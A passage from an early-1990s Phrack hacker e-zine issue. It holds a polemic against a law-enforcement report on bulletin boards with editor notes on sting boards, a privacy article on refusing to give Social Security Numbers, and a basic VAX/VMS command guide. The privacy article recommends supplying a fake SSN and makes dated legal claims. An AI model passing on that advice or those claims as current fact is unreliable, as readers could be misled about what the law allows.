university libraries, text books, and technical journals;

He ignores that the mere possession of information on how a crime MIGHT be
committed is NOT a crime; and finally,

He fails to recognize any First Amendment rights whatsoever of computer
bulletin boards to have all such information to begin with.


     "It is therefore important to set a lesson early in the careers
     steering them away from these offenses."

Of course an arrest for some minor computer mischief is not going to be great
resume material when these teenagers start applying for jobs, even though the
establishment has inspired within them the socially acceptable goal of
conforming to society's expectations.


CONCLUSIONS

The author, J. Thomas McEwen, does not know much about freedom of speech and
for that matter, he does not know much about the law.  He does know a lot about
how to sensationalize very benign conduct into dangerous conspiracy.  Perhaps
he is close friends with Geraldo Rivera.

Bulletin board operators and users take note of the law and your rights.  Don't
let yourself get taken in by Sting boards or ignorant law enforcement officers
looking for some gratification on the job since they aren't getting it at home.


S o v e r e i g n   I m m u n i t y

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Editor's Comments by: Dispater

Sting boards have been a popular topic in Phrack and Phrack World News over the
years.  In this file, Sovereign Immunity, showed us an excerpt that discussed a
Sting bulletin board in Fremont, California.  As it turns out, Knight Lightning
had some material about this way back in Phrack World News Issue 3 (which
actually appeared in Phrack Issue 4).  The article was titled "Phoenix
Phortress Stings 7."  There have also been many other articles in Phrack World
News about sting operations and bulletin boards.

Additionally, Phrack Issues 21-23 each carried one part of Knight Lightning's
"Vicious Circle" Trilogy.  The first two parts of which ("Shadows Of A Future
Past" and "The Judas Contract") contained a lot of material about sting boards
and informants.

Although Phrack has not presented material concerning Sting boards in Maricopa
County, Arizona, there was discussion about a bulletin board (The Dark Side) in
Arizona (602) run by "The Dictator" (Dale Drew) as a sting operation revealed
in Computer Underground Digest 3.02 and recently we heard that he was back in
action under the name "Blind Faith."

Dispater 
_____________________________________________________________________________?_


--------------------------------------------------------------------------------


                               == Phrack Inc. ==

                 Volume Three, Issue Thirty-five, File 6 of 13

                *****  Social Security Numbers & Privacy  *****
                 ***                                       ***
                  *     b y   C h r i s   H i b b e r t     *
                 ***                                       ***
                *****            June 1, 1991             *****

                Computer Professionals for Social Responsibility

Many people are concerned about the number of organizations asking for their
Social Security Numbers.  They worry about invasions of privacy and the
oppressive feeling of being treated as just a number.

Unfortunately, I can't offer any hope about the dehumanizing effects of
identifying you with your numbers.  I *can* try to help you keep your Social
Security Number from being used as a tool in the invasion of your privacy.

Surprisingly, government agencies are reasonably easy to deal with; private
organizations are much more troublesome.  Federal law restricts the agencies at
all levels of government that can demand your number and a fairly complete
disclosure is required even if its use is voluntary.  There are no comparable
laws restricting the uses non-government organizations can make of it, or
compelling them to tell you anything about their plans.  With private
institutions, your main recourse is refusing to do business with anyone whose
terms you don't like.

*********************
***               ***
*** Short History ***
***               ***
*********************

Social Security numbers were introduced by the Social Security Act of 1935.
They were originally intended to be used only by the social security program,
and public assurances were given at the time that use would be strictly
limited.  In 1943 Roosevelt signed Executive Order 9397 which required federal
agencies to use the number when creating new record-keeping systems.  In 1961
the IRS began to use it as a taxpayer ID number.  The Privacy Act of 1974
required authorization for government agencies to use SSNs in their data bases
and required disclosures (detailed below) when government agencies request the
number.  Agencies which were already using SSN as an identifier were allowed to
continue using it.  The Tax Reform Act of 1976 gave authority to state or local
tax, welfare, driver's license, or motor vehicle registration authorities to
use the number in order to establish identities.  The Privacy Protection Study
Commission of 1977 recommended that the Executive Order be repealed after some
agencies referred to it as their authorization to use SSNs.  I don't know
whether it was repealed, but that practice has stopped.

The Privacy Act of 1974 (5 USC 552a) requires that any federal, state, or local
government agency that requests your Social Security Number has to tell you
three things:

     1.  Whether disclosure of your Social Security Number is required or
         optional;

     2.  What law authorizes them to ask for your Social Security Number; and,

     3.  How your Social Security Number will be used if you give it to them.

In addition, the Act says that only Federal law can make use of the Social
Security Number mandatory.  So anytime you're dealing with a government
institution and you're asked for your Social Security Number, just look for the
Privacy Act Statement.  If there isn't one, complain and don't give your
number.  If the statement is present, read it.  If it says giving your Social
Security Number is voluntary, you'll have to decide for yourself whether to
fill in the number.

*****************************
***                       ***
*** Private Organizations ***
***                       ***
*****************************

The guidelines for dealing with non-governmental institutions are much more
tenuous.  Most of the time private organizations that request your Social
Security Number can get by quite well without your number, and if you can find
the right person to negotiate with, they'll willingly admit it.  The problem is
finding that right person.  The person behind the counter is often told no more
than "get the customers to fill out the form completely."

Most of the time, you can convince them to use some other number.  Usually the
simplest way to refuse to give your Social Security Number is simply to leave
the appropriate space blank.  One of the times when this isn't a strong enough
statement of your desire to conceal your number is when dealing with
institutions which have direct contact with your employer.  Most employers have
no policy against revealing your Social Security Number; they apparently
believe the omission must have been an unintentional slip.

*****************************
***                       ***
*** Lenders and Borrowers ***
***                       ***
*****************************

Banks and credit card issuers are required by the IRS to report the SSNs of
account holders to whom they pay interest or when they charge interest and
report it to the IRS.  If you don't tell them your number you will probably
either be refused an account or be charged a penalty such as withholding of
taxes on your interest.

************************************
***                              ***
*** Insurers, Hospitals, Doctors ***
***                              ***
************************************

No laws require medical service providers to use your Social Security Number as
an ID number (except for Medicare, Medicaid, etc).  They often use it because
it's convenient or because your employer uses it to certify employees to its
groups health plan.  In the latter case, you have to get your employer to
change their policies.  Often, the people who work in personnel assume that the
employer or insurance company requires use of the SSN when that's not really
the case.  When my current employer asked for my SSN for an insurance form, I
asked them to try to find out if they had to use it.  After a week they
reported that the insurance company had gone along with my request and told me
what number to use.  Blood banks also ask for the number but are willing to do
without if pressed on the issue.  After I asked politely and persistently, the
blood bank I go to agreed that they didn't have any use for the number, and is
in the process of teaching their receptionists not to request the number.

************************************************************
***                                                      ***
*** Why Is The Use of Social Security Numbers A Problem? ***
***                                                      ***
************************************************************

The Social Security Number doesn't work well as an identifier for several
reasons.  The first reason is that it isn't at all secure; if someone makes up
a nine-digit number, it's quite likely that they've picked a number that is
assigned to someone.  There are quite a few reasons why people would make up a
number: to hide their identity or the fact that they're doing something;
because they're not allowed to have a number of their own (illegal immigrants,
e.g.), or to protect their privacy.  In addition, it's easy to write the number
down wrong, which can lead to the same problems as intentionally giving a false
number.  There are several numbers that have been used by thousands of people
because they were on sample cards shipped in wallets by their manufacturers
(one is included below).

When more than one person uses the same number, it clouds up the records.  If
someone intended to hide their activities, it's likely that it'll look bad on
whichever record it shows up on.  When it happens accidently, it can be
unexpected, embarrassing, or worse.  How do you prove that you weren't the one
using your number when the record was made?

A second problem with the use of SSNs as identifiers is that it makes it hard
to control access to personal information.  Even assuming you want someone to
be able to find out some things about you, there's no reason to believe that
you want to make all records concerning yourself available.  When multiple
record systems are all keyed by the same identifier, and all are intended to be
easily accessible to some users, it becomes difficult to allow someone access
to some of the information about a person while restricting them to specific
topics.

***********************************************
***                                         ***
*** What Can You Do To Protect Your Number? ***
***                                         ***
***********************************************

If despite your having written "refused" in the box for Social Security Number,
it still shows up on the forms someone sends back to you (or worse, on the ID
card they issue), your recourse is to write letters or make phone calls.  Start
politely, explaining your position and expecting them to understand and
cooperate.  If that doesn't work, there are several more things to try:

     1.  Talk to people higher up in the organization.  This often works simply
         because the organization has a standard way of dealing with requests
         not to use the SSN, and the first person you deal with just hasn't
         been around long enough to know what it is.

     2.  Enlist the aid of your employer.  You have to decide whether talking
         to someone in personnel, and possibly trying to change corporate
         policy is going to get back to your supervisor and affect your job.

     3.  Threaten to complain to a consumer affairs bureau.  Most newspapers
         can get a quick response.  Some cities, counties, and states also have
         programs that might be able to help.

     4.  Tell them you'll take your business elsewhere (and follow through if
         they don't cooperate).

     5.  If it's a case where you've gotten service already, but someone
         insists that you have to provide your number in order to have a
         continuing relationship, you can choose to ignore the request in hopes
         that they'll forget or find another solution before you get tired of
         the interruption.

If someone absolutely insists on getting your Social Security Number, you may
want to give a fake number.  There is no legal penalty as long as you're not
doing it to get something from a government agency or to commit fraud.  There
are a few good choices for "anonymous" numbers. Making one up at random is a
bad idea, as it may coincide with someone's real number and cause them some
amount of grief.  It's better to use a number like 078-05-1120, which was
printed on "sample" cards inserted in thousands of new wallets sold in the 40s
and 50s. It's been used so widely that both the IRS and SSA recognize it
immediately as bogus, while most clerks haven't heard of it.  It's also safe to
invent a number that has only zeros in one of the fields. The Social Security
Administration never issues numbers with this pattern.  They also recommend
that people showing Social Security cards in advertisements use numbers in the
range 987-65-4320 through 987-65-4329.

The Social Security Administration recommends that you request a copy of your
file from them every few years to make sure that your records are correct.

                                ***************
                                ***         ***
                                *** THE END ***
                                ***         ***
                                ***************
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                Volume Three, Issue Thirty-five, File 7 of 13

      <:=--=:><:=--=:><:=--=:><:=--=:>|/<:=--=:><:=--=:><:=--=:><:=--=:>
      <:=--=:>                                                   <:=--=:>
      <:=--=:>    >>>>>=-*  Users Guide to VAX/VMS  *-=<<<<<     <:=--=:>
      <:=--=:>                                                   <:=--=:>
      <:=--=:>                   Part I of III                   <:=--=:>
      <:=--=:>                                                   <:=--=:>
      <:=--=:>            Part A:  Basic Information             <:=--=:>
      <:=--=:>         Part B:  Programming the VAX/VMS          <:=--=:>
      <:=--=:>                                                   <:=--=:>
      <:=--=:>                   By: Black Kat                   <:=--=:>
      <:=--=:>                                                   <:=--=:>
      <:=--=:><:=--=:><:=--=:><:=--=:>/|<:=--=:><:=--=:><:=--=:><:=--=:>


Index
~~~~
Part A contains information on the following topics:

   o  Background                          o  Logical Names
   o  Terminal Control Keys               o  System Default Logical Names
   o  Logging in                          o  Logical Name Tables
   o  Digital Command Language (DCL)      o  User Environment
   o  Error Messages                      o  Terminal Characteristics
   o  Command Line Editing                o  File Security
   o  Files and Directories               o  EDT Text Editor
   o  File Operations                     o  EDT Help manual

Part B contains information on the following topics:

   o  Programming VAX/VMS              o  Parameters
   o  DCL Expressions                  o  Terminal I/O
   o  Command Procedures               o  File I/O
   o  Writing Command Procedures       o  Redirecting Command Procedure I/O
   o  Comments                         o  Branching and Conditionals
   o  Labels                           o  Loops
   o  Debugging                        o  Subroutines
   o  Invoking Command Procedures      o  Error Handling
   o  Symbols                          o  Termination
   o  Lexical Functions                o  Example Command Procedures


                   <:=- Part A : Basic Information -=:>

Introduction
~~~~~~~~~~~
VAX is an acronym for Virtual Address eXtension, a 32-bit computer developed by
Digital in the 1970's.  The VAX architecture supports multiprogramming, where
many users running different programs can use the VAX simultaneously and each
appears to have full control of the computer's resources.  The multiprocessing
VAX functions vary differently from the old timesharing systems, which would
allocate a slice of CPU time to each user of the system in a rotating fashion,
whether the time slice was required or not.  The VAX/VMS environment, however,
provides each user an allocation of processor time based on the user's needs
and priority. If a user does not need his quantum of time, or a portion of it,
it is given to the next user.  This scheduling method is very efficient when
compared to the old method of timesharing.

The VAX is capable of addressing more than four billion addresses, through a
method known as virtual memory addressing.  Because the memory is virtual
however, there is no need to have four billion bytes of physical memory.  The
VAX executes programs by a technique known as paging, whereby a single "page"
of the program is read into memory at a time, and when a new page is needed,
the old one is "swapped" back out to disk to make room for the new one.  The
VMS operating system ties everything together.  The user interacts with VMS
(Virtual Memory System) through a Command Language Interpreter (CLI), usually
the Digital Command Language (DCL).

When you use VAX/VMS, you are known to the system as a process, which is
created when you log in to the system and deleted when you log out.  This
process carries with it various attributes to identify you from other system
users (process name, identification, user identification code, privileges,
etc).


Terminal Control Keys
~~~~~~~~~~~~~~~~~~~
Ctrl-A      Allows you to insert, rather than overstrike, characters on a
            DCL command line that you're editing.
Ctrl-B      Displays DCL commands that you've previously entered.
Ctrl-C      Interrupts the coessed or the program being executed.
Ctrl-E      Positions the cursor at the end of the line.
Ctrl-H      Positions the cursor at the beginning of the line.
Ctrl-I      Tab
Ctrl-O      Alternately suppresses and continues the display of the output
            terminal.
Ctrl-Q      Enables (toggles on) output to the display after CTRL-S.
Ctrl-R      Retypes the current input line and repositions the cursor atthe
            end of the retyped line.
Ctrl-S      Disables (toggles off) output to the display until CTRL-Q is
            pressed.
Ctrl-T      Displays process statistics.
Ctrl-U      Discards the current input line and performs carriage return.
Ctrl-W      Refreshes the screen.
Ctrl-X      Flushes the type-ahead buffer.
Ctrl-Y      Interrupts command or program execution and returns control to
            the DCL command line interpreter.
Ctrl-Z      Indicates end of file for data entered from terminal.


Logging in
~~~~~~~~
Most VAX systems prompt you with something like this:

   Welcome to VAX1
   Username:

Type your username and press <enter>.  You'll then be prompted for your
password.  If you enter the correct username/password combination, you'll
be given something like the following:

          Welcome to VAX/VMS V4.4
   Last interactive login on Monday, 16-JUL-87  16:12
   Last non-interactive login on Friday, 13-JUL-87  00:14
   $

If you entered an incorrect username and password, you'll receive the
message:

   User authorization failure

Just hit <enter> and you'll be prompted for your username again.  Once
you're logged in, you'll be given the DCL prompt ($).  This indicates that
the system is ready to accept interactive commands.

To log out, use the command:

   $ LOGOUT


The Digital Command Language (DCL)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DCL is comprised of more than 200 commands called verbs.  Each DCL verb acts on
a parameter or assumed parameter, and the action of these verbs and the scope
of their parameters can be modified with qualifiers.  The basic command
structure is:

$ LABEL: COMMAND-NAME PARAMETER(S) /QUALIFIER(S) !COMMENT
    |           |         |             |           |
    |           |         |             |           +-- Optional Comment
    |           |         |             |
    |           |         |             +-------------- Command modifier(s)
    |           |         |
    |           |         +---------------------------- Object of the
Command
    |           |
    |           +-------------------------------------- DCL command verb
    |
    +-------------------------------------------------- Optional Label

A label is an optional, user-specified string with a maximum length of
255 characters.  It is most commonly used in command procedures.

A DCL command verb defines the action the VAX will take when the command
line is interpreted.

Parameter(s) specify the object or a list of objects the DCL command verb
will act upon.  Multiple parameters may be specified but must be separated
from one another by a space, multiple spaces, or a tab.  If you enter a DCL
command that requires parameters, but you don't enter them on the command
line, the DCL interpreter will prompt you for them automatically.

Qualifiers further define or modify the function the DCL command will
perform.  They consist of a keyword followed by a value or a list of
values.

The qualifier keyword must be preceded by a slash (/).  Multiple qualifiers
may be specified, but each must be preceded with a slash.  Qualifiers
usually aren't required.  There are three kinds of qualifiers:  parameter,
positional, and command.  A command qualifier applies to the whole command.
Generally, these are placed at the end of the command.  For example:

   $ DIRECTORY [BYNON],[BYNON.DECPRO]/FULL

This displays a full listing of two directories, using the /FULL qualifier of
the DIRECTORY command.  A positional qualifier takes on a different meaning
based on where it is located in the command.  If a positional qualifier is
placed after the command verb, but before the first parameter, the qualifier
will affect the entire command.  If the same positional qualifier is placed
after a parameter, only that parameter will be affected.  For example:

   $ PRINT/COPIES=3 MEMO1.TXT,MEMO2.TXT
   $ PRINT MEMO1.TXT/COPIES=2,MEMO2.TXT

The first command prints three copies of each file.  The second command prints
two copies of the first file, but only one copy of the second.  A parameter
qualifier affects only the parameter it follows.  In the following example,
MEMO1.TXT is sent to the queue LASER and MEMO2.TXT is sent to queue FAST_PRINT:

   $ PRINT MEMO1.TXT/QUEUE=LASER,MEMO2.TXT/QUEUE=FAST_PRINT

A comment is an optional, user-specified comment about the command.  It is
commonly used in command procedures to document the command.


Error Messages
~~~~~~~~~~~~
Generally, error messages are of the format:

   % FACILIT-L-IDENT, TEXT
   |   |     |   |      |
   |   |     |   |      +-- explanation of the error message
   |   |     |   |
   |   |     |   +--------- abbreviated message text, for reference
   |   |     |
   |   |     +------------- error severity
   |   |
   |   +------------------- Vax/VMS facility or component (error source)
   |
   +----------------------- message number: "%" = first, "-" = subsequent

A percent sign (%) indicates the first error message for a given command.
All subsequent errors for that command are preceded with a hyphen (-).

The facility indicates the source of the error.  The source may be the DCL
command line interpreter, one of the various VMS utilities, or a program
image.

The severity level indicator (L) will have one of the following values:
S (successful completion), I (information), W (warning), E (error), or
F (fatal or severe error).

The ident is an abbreviation of the error message text.  It can be referenced
in the VAX/VMS System Messages manual.

The text provides an explanation of the error message.


Command line editing
~~~~~~~~~~~~~~~~~~
DCL stores the last 20 command lines entered.  You can display a list of them
with:

   $ RECALL /ALL

The resulting display might look like:

   1  DIR
   2  COPY VAX1::$1$DUA5:[BYNON]LOGIN.COM LOGIN.COM;1
   3  EDIT LOGIN.COM
   $

To recall a specific command from the recall buffer, use the DCL RECALL
command with a command line number as a parameter.  For example:

   $ RECALL 2
   $ COPY VAX1::$1$6DUA5:[BYNON]LOGIN.COM LOGIN.COM;1


Files and Directories
~~~~~~~~~~~~~~~~~~~~
Files are organized much like MS-DOS, with a directory-tree structure.  The
user's default directory (assigned by the system administrator) is the "root"
directory.  Up to seven subdirectories may be created, each containing as many
subdirectories as you like.  The complete file specification looks like:

   VAX1 :: DUA0 : [BYNON.PROGRAMMING.FORTRAN]WINDOWS.FOR;3
    |       |                |                  |     |  |
    |       |                |                  |     |  |
   node   device         directory          filename  |  version
                                                     type
                                                     
The node name identifies a computer system in a network.  If no node name is
specified, VMS assumes the file is located on the local node where you're
logged in.

The device name is the physical device where the file is stored.  It is a
four-character alphanumeric code which identifies the device type, hardware
controller to which it is attached, and the unit number of the device on the
controller.  If you omit the device name from a file specification, VMS assumes
you are referring to your default device.

The directory entry is enclosed in brackets, and is the name of the directory
that contains the file.  If you omit the directory name from a file
specification, VMS will assume you are referring to your default directory.

The filename may consist of up to 39 alphanumeric characters.

The file type is a code consisting of up to 39 alphanumeric characters, and it
generally indicates the type of information supplied in the file.  Some system
programs and utilities supply a three character default file type.

The version number is a 1 to 5 digit number the system assigns to every file by
default.  When a file is created, it is assigned a version number of 1.  Each
time the file is edited or another version of it is created, the version number
is automatically incremented by 1.  Alternatively, you may specify a version
number of your choice.

No blank spaces are allowed within any portion of a file specification.  In
VMS Version 4.x, the maximum lengths are as follows:

   node name           up to 6 characters
   device name         four characters
   directory name      up to 39 characters
   subdirectory name   up to 39 characters
   file name           up to 39 characters
   file type           up to 39 characters
   version number      up to 5 decimal digits with a value between 1
                       and 32,767

File specifications must be unique; no two files can have completely identical
specifications.  It's conceivable to have many copies of NOTES.TXT in a
subdirectory, but only one NOTES.TXT;8 may exist in the same subdirectory.

Wildcards are similar to those in MS-DOS, with an asterisk (*) representing
a filename or filetype, and a percent sign (%) indicating a single
character.


File operations
~~~~~~~~~~~~~~
Creating and modifying files:  $ CREATE TEMP.DAT
                               TEMP 1
                               TEMP 2
                               <CTRL-Z>

Renaming files:   $ RENAME TEMP.DAT NEW.DAT
                  $ RENAME TEMP.DAT [BYNON.PROG]TEMP.DAT
                  Note: you cannot rename files across devices, just
                  directories.

Copying files:    $ COPY TEMP.DAT NEW.DAT
                  $ COPY TEMP.DAT,TEST.DAT NEW.DAT

Appending files:  $ APPEND TEMP.DAT NEW.DAT

Deleting files:   $ DELETE TEMP.DAT;1
                  $ DELETE *.DAT;*
                  $ DELETE /CONFIRM .DAT;*  (confirm each file)

Displaying files: $ TYPE /PAGE TEMP.DATE    (one page at a time)

Directories:      $ DIRECTORY
                  $ DIRECTORY DJA1:[BYNON.PROG]

Printing files:   $ PRINT TEMP.DAT

Purging files:    $ PURGE *.DAT   (erase all but latest version of .DAT files)

Create a dir:     $ CREATE/DIRECTORY [.BUDGET]

Set default dir:  $ SET DEFAULT [BYNON.PROG]
                  $ SET DEFAULT [.PROG]

Delete a dir:     $ SET DEFAULT [BYNON.PROG]
                  $ DELETE *.*;*
                  $ SET DEFAULT [BYNON]
                  $ SET PROTECTION=(0:D) PROG.DIR;1
                  $ DELETE BUDGET.DIR;1


Logical Names
~~~~~~~~~~~~
A logical name is a substitute for a file specification, portion of a file
specification, or another logical name.  They provide two primary functions:
file and device independence and file specification shorthand.

File and device independence means that you are not constrained by a physical
element, such as a disk or printer name.  If you use files nested deeply in
subdirectories, with long names, or on devices or nodes other than your
default, you can define a meaningful logical name to represent it.  These
shorthand names are faster to type and easier to remember.

To define a logical name:

   $ DEFINE PARTS_DBF DJA2:[DATABASES]PARTS.DAT

This example will associate the logical name PARTS_DBF with the file
specification  DJA2 : [DATABASES]PARTS.DAT.  Now, PARTS_DBF may be used
anywhere as a substitute for the complete file specification.

Other commands also can be used to assign logical names.

Assign  :  Associates equivalence names with a logical name
Mount   :  Mounts a disk or tape volume and assigns a system logical for the
           volume.
Allocate:  Allocates a system device for private use and optionally (command
           qualifier) assigns a logical name to the device.
Open    :  Opens a file for read or write operations and assigns a logical
           name to the file specification.

To display the logical name translations: $ SHOW LOGICAL PARTS_DBF will
display: "PARTS_DBF" = "DJA2:[DATABASES]PARTS.DAT"  (LNM$PROCESS_TABLE).

To deassign a logical name:  $ DEASSIGN  PARTS_DBF


System default logical names
~~~~~~~~~~~~~~~~~~~~~~~~~~~
SYS$COMMAND   The initial file, or input stream, from which the DCL command
              line interpreter reads input data.  The logical name
              SYS$COMMAND is equated to your terminal for interactive
              processes.
SYS$DISK      Your default disk as assigned in the UAF.
SYS$ERROR     The device on which the system displays all error and
              informational messages.  By default, SYS$ERROR is assigned
              to your terminal for interactive processes, and to the batch
              job log file for any batch processes.
SYS$INPUT     The default file or input stream from which data and commands
              are read by either the DCL command line interpreter or
              programs executing in your account.  By default, SYS$INPUT is
              equated to your terminal for interactive processes and to the
              batch job stream (or command procedure) for batch processes.


Logical Name Tables
~~~~~~~~~~~~~~~~~
Logical names are stored in system files called logical name tables.
The following are the four most commonly used:

Group table  :  Contains the logical names available to all users in your
                UIC (User Identification Code) group.
Job table    :  Contains the logical names available to your process and
                any subprocess it creates.
Process table:  Contains the logical names available to your process only.
System table :  Contains the logical names that may be used by all users
                of the system.


User Environment
~~~~~~~~~~~~~~
The User Authorization File (UAF) is a system file controlled and modified
by the system manager.  A record for each system user is contained in the
UAF.

A User Identification Code (UIC) is an identifier used by VAX/VMS to identify
users and groups of users.  It is used to identify processes, directories,
files, and other objects in the system.  A UIC may be specified numerically or
alphanumerically, and is made up of two parts, a group and a member, specified
in the format: [group,member].  For example, UIC [10,14] identifies group 10,
user 14.  The group number is an octal number in the range 1-37776, and the
member is an octal number in the range 0-177776.  An alphanumeric UIC contains
a member name and optionally, a group name in the format: [member] or
[group,member].  The group and member names in an alphanumeric UIC may contain
1 to 31 alphanumeric characters (A-Z, 0-9, underscore, dollar sign).

Each user of the system is limited in the consumption of system
resources, and these limits control the rate at which your process or
any subprocesses you create may consume a resource.  There are 32 levels
of priority in the VAX/VMS system, 0 through 31, the highest being 31.
The priorities are divided into two ranges: timesharing (0-15) and
real-time (16-31).  The default user priority is 4.  Depending on how
heavily the system is being used, your priority may be raised above the
default, but never lowered below it.  VAX/VMS maintains 35 privileges,
divided into the following seven categories classified by how much
damage could be done to the system by possessing them:

None    No privileges.
Normal  The minimum privilege needed to use the system effectively.
Group   The ability to effect members of the same UIC group.
Devour  The potential to consume noncritical system-wide resources.
System  The ability to interfere with normal system operation.
File    The potential to bypass file protection security.
All     The ability to take over the entire system.

VAX/VMS systems keep a record of overall computer system use by account
holder in a system file called ACCOUNTING.DAT.  The system manager uses
this file to produce reports with the Accounting Utility.  This can be
used to learn more about how the system is being used, how it performs,
and how a particular user is using the system.  It can also be used to
bill users for system time.


Terminal Characteristics
~~~~~~~~~~~~~~~~~~~~~~
Setting display width:  $ SET TERMINAL/WIDTH=132

Shutting messages off:  $ SET TERMINAL/NOBROADCAST
  This prevents other users from phoning you, sending mail messages, and
  some system messages from appearing on your screen.  If you just want
  mail and phone messages screened, use: $ SET BROADCAST=(NOMAIL,NOPHONE).

Increasing type-ahead buffer:  $ SET TERMINAL/ALTYPEHD/PERMANENT

Line editing modes:  $ SET TERMINAL/INSERT or $ SET TERMINAL/OVERSTRIKE

Defining keys:  $ DEFINE/KEY PF1 "SET DEFAULT DUA3:[INV.SUP]"
                % DCL-I-DEFKEY, DEFAULT key PF1 has been defined

Showing keys:   $ SHOW KEY PF1      (or $ SHOW KEY ALL)
                DEFAULT keypad definitions:
                   PF1 = "SET DEFAULT DUA3:[INV.SUP]"

Deleting keys:  $ DELETE/KEY PF1    (or $ DELETE/KEY ALL)
                % DCL-I-DELKEY, DEFAULT key PF1 has been deleted


Changing prompt:  $ SET PROMPT = "What now?"

Displaying process information:  $ SHOW PROCESS  (add a qualifier)

Changing process information:  $ SET PROCESS/NAME="Bob"
                               $ SET PROCESS/PRIVILEGES=OPER


File Security
~~~~~~~~~~~~
UIC-based protection permits access to be granted or denied based on
protection codes that reflect four user categories:

System:  system manager
Owner :  account owner
Group :  users in same UIC group
World :  all users of system, regardless of UIC

Four type of file access can be granted or denied to members of these user
categories:

Read    (R): read the file
Write   (W): create or modify the file
Execute (E): run a program
Delete  (D): delete the file

Generally, any category of user can be granted or denied file access
with this protection scheme.  However, you can read a file in a
subdirectory with EXECUTE access if you know its filename and filetype.
Also, since SYSTEM privileges include the ability to bypass all file
protection, anyone within the SYSTEM category can read a file.

CONTROL access, or the ability to change the protection and ownership of
a volume, is never specified in the UIC-based protection code.  This is
the fifth type of protection that can be specified in an access control
list (ACL).  It's automatically granted to two user categories when VMS
examines UIC-based protection.  Users in the SYSTEM and OWNER categories
receive CONTROL access by default while GROUP and WORLD categories are
denied CONTROL access.

File protection defaults are as follows:

System:  RWED
Owner :  RWED
Group :  RE
World :  No access

To determine the existing or default protection of a file, use the SHOW
PROTECTION command.  The default in the previous example would be:
   $ SHOW PROTECTION
       SYSTEM=RWED, OWNER=RWED, GROUP=RE, WORLD=NO ACCESS

If you want to see file protection in directories, use the /PROTECTION
qualifier with the DIRECTORY command.

To change the protection of a file, use the command:

   $ SET PROTECTION=(O:RWE,G,W) LOGIN.COM

In this example, the account owner has READ, WRITE, and EXECUTE access
to his LOGIN.COM file.  The GROUP and WORLD categories have no access
and SYSTEM access remains unchanged.

Rules for specifying protection codes:
1.  Access types must be abbreviated with one letter: R, W, E, or D.
2.  User categories may be spelled out or abbreviated.
3.  Each user category must be separated from its access types with a colon.
4.  If you specify multiple user categories, separate each with a comma
    and enclose the entire code in parenthesis.
5.  User categories and access types may be specified in any order.
6.  If you include a user category, but do not specify an access type
    for that category, access is automatically denied.
7.  If you omit a user category entirely, protection for that category
    is unchanged.

Remember that VAX/VMS evaluates directory protection before file
protection.  If you grant WORLD:R access to a file, but the file is in a
directory without WORLD:R access, another user couldn't read the file.


EDT Text Editor
~~~~~~~~~~~~~~
When you enter EDT, you automatically enter line mode, indicated by the
EDT prompt, an asterisk (*).  All line mode commands are made at the
asterisk prompt and terminated by pressing <Return>.  Lines that you
input are numbered sequentially by the editor.  You can reference a line
or group of li^S^Qnes based on the line number or range of line numbers.  A
list of basic EDT commands follows.  Each command may be abbreviated to
the characters in parenthesis.  Complete information on all EDT line
mode commands can be found through the use of the line mode EDT HELP
command.

Commands          Function
~~~~~~~         
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Change (C)        Change from line to keypad mode.  To switch back from
                  keypad mode to line mode, press <Ctrl-Z>.
Copy (CO)         Copy a line or group of lines from one place to another.
                  If you enter the command CO 5 to 10, line 5 will be
                  copied to the line immediately preceding line 10.  The
                  command CO 5:10 to 20 would copy the contents of lines 5
                  through 10 into the area immediately preceding line 20.
Delete (D)        Delete a line or group of lines.  The command D13 would
                  delete line 13, while D13:20 will delete lines 13 to 20.
Exit (EX)         Terminates the EDT session, saving all changes.  This
                  also creates a new version of the file being edited.
Help (H)          Display on-line help on all EDT line mode commands.  The
                  help messages will not be included in the file being edited.
Include (INC)     Copy text from an external file into the file being edited.
                  When the EDT command INCLUDE FILENAME.TYPE is executed,
                  the contents of FILENAME.TYPE are copied into the file
                  being edited.
Insert (I)        Inserts specified text directly before the current
                  position in the file.  While inserting text, you will
                  not receive the EDT "*" prompt.  Press <Ctrl-Z> to
                  return to the "*" prompt when you're finished inserting.
Move (M)          You can't cut and paste with a line-oriented editor.
                  Text will be moved to the area immediately preceding a
                  specified line.  The command M 10:15 to 50 would move
                  lines 10 through 15 to the area immediately preceding
                  line 50.
Quit (QUI)        Exit the EDT editor without saving changes.
Replace (R)       Deletes a specified line or group of lines and enters the
                  INSERT mode so you can add text in that place.  The
                  command R5:10 would delete lines 5 through 10 and switch
                  to the INSERT mode to permit you to enter new text.  To
                  exit the INSERT mode, press <Ctrl-Z>.
Resequence (RES)  Numbers all of the lines in the file that you're
                  editing in increments of 1.  This is useful because
                  text insertion, movement, or deletion causes the file
                  to lose numeric sequence.
Substitute (S)    Substitute a new text element for an old one in the
                  format s/oldtext/newtext/range.  The old and new text
                  elements must be enclosed in angle bracket (< >)
                  delimiters and the range must be specified.
Write (WR)        Write a given range of text to a new file.
                  WRHISTORY.TXT 50:100 would write lines 50 through 100 to
                  a new file called HISTORY.TXT.


EDT Help Manual
~~~~~~~~~~~~~
To dump the entire EDT Help file to disk, enter the following DCL command
during a terminal session:  $ ASSIGN EDTHELP.FIL SYS$OUTPUT.  Now, enter
line mode EDT and type:  * HELP *.  Now exit EDT and enter the DCL
command: $ ASSIGN TTnn: SYS$OUTPUTT (TTnn: is your terminal number).


                  <:=- Part B : Programming VAX/VMS -=:>

Introduction
~~~~~~~~~~~
A symbol is a name chosen to represent a string of characters, a numeric value,
or a logical (true/false) value.  A symbol may be used wherever the value it
represents would normally be found, and can be up to 255 characters long.
Symbols must begin with a character, dollar sign, or underscore, and are not
case-sensitive.  Symbols are created like this:

   symbol_name = value    (local symbol)
   symbol_name == value   (global symbol)

A global symbol may be used at any command level, but local symbols are lost
when command procedures are finished.  For example:

   $ WIDE = "SET TERMINAL/WIDTH=132"

Now, anytime you type WIDE at the DCL command line, the terminal width will
be changed to 132 characters.  To show the contents of a symbol:

   $ SHOW SYMBOL ANSWER
      ANSWER = 1584    HEX = 00000630    OCTAL = 000000003060

The SHOW SYMBOL command uses the local symbol table by default.  To show
the value of a global symbol, use the /GLOBAL qualifier.  To show all
symbols, use the /ALL qualifier (or /GLOBAL/ALL).  To delete symbols,
use: $ DELETE/SYMBOL symbol_name command (with /GLOBAL if it's global).

When a DCL command is executed, symbols in the following positions are
automatically translated:

  o  the beginning of the command
  o  in a lexical function
  o  in a WRITE or IF statement
